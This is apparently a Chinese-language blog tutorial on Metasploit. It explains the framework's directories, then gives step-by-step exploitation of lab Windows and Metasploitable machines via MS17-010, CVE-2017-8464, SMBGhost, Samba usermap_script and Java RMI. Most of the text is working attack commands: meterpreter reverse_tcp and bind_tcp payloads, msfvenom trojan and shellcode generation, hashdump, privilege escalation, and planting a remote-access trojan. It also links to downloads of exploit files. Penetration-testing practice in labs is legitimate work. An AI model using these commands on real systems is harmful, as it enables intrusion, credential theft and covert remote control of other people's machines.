打开kali:

这个kali都配置好了

链接:https://pan.baidu.com/s/1PPhNtwC8ltpeBJ-qiJjV5A?pwd=8kuf

提取码:8kuf



cd /usr/share/metasploit-framework/

看看目录:

msf使用:_php



目录结构:

Modules:用户用到的各种模块几乎都在这里 ,用户使用use这个msf这里时,就是用到了这个目录下的模块。这个目录下的文件在msfconsole启动时会被自动加载的,如果看到msfconsole启动时有出错信息但又能成功启动可以根据出错信息找解决方法,个人写的Module也可以放在这个目录下。

Auxiliary:主要包含shentou测试中一些辅助性的脚本,这些脚本功能有扫描,嗅探,破解,注入,漏洞挖掘等 Encoders:各种编码工具 用于躲过入侵检测和过滤系统。

Exploits:主要包含了传说中的exp、0day、各种漏洞利用的脚本。主要的攻击代码全在这,这里边包含的exp的路径的命名规则是 系统/服务/模块,在使用exp是可以根据这个命名方法来找(也可以用search这条指令来找)。比如:use exploites/windows(系统)/vnc(服务)/realvnc_client(模块名) Nops: NOP (No Operation or Next Operation) sled,由于IDS/IPS会检查数据包中不规则的数据,所以在某些场合下(比如针对溢出攻击),某些特殊的滑行字符串(NOPS x90x90...)则会因为被拦截而导致攻击失效,所以此时需要修改exploit中的NOPs.nops文件夹下的东西会在payload生成时用到(后面会有介绍)。比如我们打开php的NOPS生成脚本,就会发现它只是返回了指定长度的空格而已。(不理解没关系)

Payloads :这个单词翻译过来叫载荷:是攻击者发送给系统执行的指令(不包含exploits攻击阶段),payloads主要是在目标机执行的,而exploits是在本地机执行作用于目标机。命名规则是: 系统/类型/名称 比如: use payloads/windows/shell/bind_tcp Post: 这个目录里放着msf 的exploits执行成功后,向目标机发送的一些功能性指令比如:提权,获取hash等。 Data:这个目录里盛放了Meterpreter、PassiveX、Vnc、DLLs等这些工具和一些用户接口代码,Msfweb 和一些其他模块用到的数据文件。

Data下js文件夹下的Detect,这里面存放的是MSF的探针文件。如果看过MSF浏览器攻击脚本的代码,就会发现调用了一个js库,然后检查当前请求是否符合被攻击环境。如果符合则发送攻击代码,否则中断。

Memory中主要是一些堆喷射代码。在大部分浏览器漏洞利用过程,堆喷射是一个不可或缺的过程(当然不是绝对的!)。并且不同的浏览器及版本间,堆喷射代码都有所不同。所以这里给出的探针代码和堆喷射代码是不是一个非常好的学习资源呢。

Plugins:这里的模块用户需要使用load 来加载,提供数据库连接插件,和各种要用到的插件。

Scripts:这个目录下的文件大都是Meterpreter这个模块利用的脚本。比如郭Meterpreter里用到的migrate来转移到其他进程的指令的源代码就在这个目录下。 这里的rc脚本相当于Windows下的批处理脚本,在某些情况下会有一定便捷性。比如Veil在生成免杀payload的同时也会生成一个rc脚本,此时使用msfconsole –r xx.rc便可以快速的建立一个和payload对应的handler,亦或在攻过程中需要你反复的set exploit,那么就可以使用这个批处理脚本了,而这个目录下则是一些给定的rc脚本,虽然你可能不习惯这样使用,但作为改写自己的rc脚本的资源也不错。

Tools:包含一些有用的脚本和零散的工具。

终端输入msfconsole

msf使用:_目标机_02


使用:

search ms17-010

use 2

show options


msf使用:_目标机_03

输入info看详细信息:

msf使用:_漏洞利用_04

set rhosts 192.168.111.132(要攻击的win7 ip)

msf使用:_漏洞利用_05

set payload windows/x64/meterpreter/reverse_tcp

msf使用:_目标机_06

run 或者 exploit

最后博主没成功:

msf使用:_目标机_07

成功会进入

meterpreter> 可以输入background等操作

hashdump:读账号密码

getsystem:提权

也可以转发端口流量,远程登录

更多用法可以自行谷歌

传木马:

Pcshare来传:

填物理机ip

msf使用:_php_08

点击生成:

简单来说,你可以上传本机的任意文件到远程目标主机中。 命令: 1.upload <file> <destination>

先用rz上传到kali

我就直接拖了

msf使用:_php_09

download命令可以下载远程主机上的文件 命令: 1.download <file> <path to save> 注意:Windows路径要使用双斜线 如果我们需要递归下载整个目录包括子目录和文件,我们可以使用download -r

执行:

我们也可以使用execute命令在目标主机上执行应用程序 语法也非常简单 命令: 1.execute -f <path> [options]

execute - C:\Users\j\Desktop\char1es.exe

pcshare也看得到:

msf使用:_漏洞利用_10

右键,可以进行这些骚操作:

msf使用:_目标机_11

CVE-2017-8464:

msf使用:_目标机_12


同理

search cve-2017-8464

use 0

msf使用:_php_13


show options

info

msf使用:_php_14


这里靶机是win7:

set PAYLOAD windows/meterpreter/reverse_tcp

set lhost 192.168.111.132

exploit

msf使用:_php_15

拷贝到u盘里

开启监听:

msf使用:_目标机_16

CVE-2020-0796:

上传文件夹SMBGhost

链接:https://pan.baidu.com/s/10X2emYCA1S6AOGcqaN23Fg?pwd=h017

提取码:h017

msf使用:_漏洞利用_17


先扫ip:

msf使用:_目标机_18

输入:

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python


msf使用:_目标机_19

替换poc文件夹的exploit.py

msf使用:_目标机_20

msf使用:_漏洞利用_21

然后开另一个窗口


use exploit/multi/handler


set payload windows/x64/meterpreter/bind_tcp


set lport 4444//监听端口


set rhost 192.168.111.131 //目标主机


run

msf使用:_目标机_22

回到原来窗口:

python3 exploit.py -ip 192.168.111.131

msf使用:_目标机_23

msf使用:_php_24

msf使用:_php_25

linux相关:

metasploitable-linux-2.0.0.zip

链接:https://pan.baidu.com/s/1ebqYJpw9Sug3f-5x55pOKA?pwd=jwhe

提取码:jwhe

账号:msfadmin

密码;msfadmin

可以改一下密码:

msf使用:_漏洞利用_26


/etc/init.d/networking restart 重启一下网络

打开msf

search scanner/samba

use auxiliary/scanner/smb/smb_version

set rhosts 192.168.111.134

查看到版本:

msf使用:_php_27

use exploit/multi/samba/usermap_script

set 你的ip

exploit

msf使用:_php_28

已经成功了,我输入ls:

msf使用:_漏洞利用_29


bash -i:

msf使用:_漏洞利用_30

php cgi漏洞利用:

search cve:2012-1823

use exploit/multi/http/php_cgi_arg_injection

同上

Java RMI SERVER 命令执行漏洞与java cve-2013-0422:

use exploit/multi/misc/java_rmi_server

set RHOST IP

exploit

shell

msf使用:_目标机_31

msf使用:_漏洞利用_32

MSF木马生成使用

木马生成:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.16.56 LPORT=5555 -f exe -o 7qi.exe

本地监听:

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.111.133

msf exploit(handler) > set lport 4444

msf exploit(handler) > exploit

总结:使用方法大同小异,不再演示了